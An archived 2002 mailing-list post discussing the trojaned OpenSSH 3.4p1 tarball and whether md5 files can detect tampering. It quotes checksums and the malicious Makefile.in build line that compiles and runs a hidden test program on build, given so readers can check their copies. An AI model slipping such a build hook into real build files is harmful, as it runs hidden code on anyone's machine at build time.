[ale] ! Openssh package trojaned...

John Wells jb at sourceillustrated.com
Thu Aug 1 11:32:45 EDT 2002


This brings to mind a question I've had for awhile now.
Many sites provide md5 files in addition to a tarball so you can run
md5sum on the tarball and compare the hash.  What prevents some hax0r from
posting a fake md5 file when they compromise a tarball, so the sums will
match?

>From what little I know about FreeBSD, it seems that ports allowed this

bogus package to be spotted.  I assume this would not be the case on
linux.  So what good is an md5 file anyway?  I'm probably missing
something here...

Thanks,

John

Jonathan Rickman said:
> On 1 Aug 2002, cfowler wrote:
>
>> Do we need to do anything to our current installs of this ver?
>
> Follow-up to my earlier post.
>
> MD5 checksum of trojaned package - 3ac9bc346d736b4a51d676faa2a08a57
>
> MD5 checksum on the package I used to build mine
>
> jonathan at abacus:~$ md5sum tmp/openssh-3.4p1.tar.gz
>
> 459c1d0262e939d6432f193c7a4ba8a8  tmp/openssh-3.4p1.tar.gz
>
> jonathan at abacus:~$
>
> If you want more piece of mind, extract the tarball and check
> ./openssh-3.4p1/openbsd-compat/Makefile.in for this:
>
>  all: libopenbsd-compat.a
> +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
> ./bf-test.out &
>
> If it's there, and you have a different MD5 checksum than the one posted
> above...please let the rest of us know.
>
> --
> Jonathan Rickman
> X Corps Security
> http://www.xcorps.net
>
>
>
>
>
> ---
> This message has been sent through the ALE general discussion list. See
> http://www.ale.org/mailing-lists.shtml for more info. Problems should be
>  sent to listmaster at ale dot org.




---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be 
sent to listmaster at ale dot org.






More information about the Ale mailing list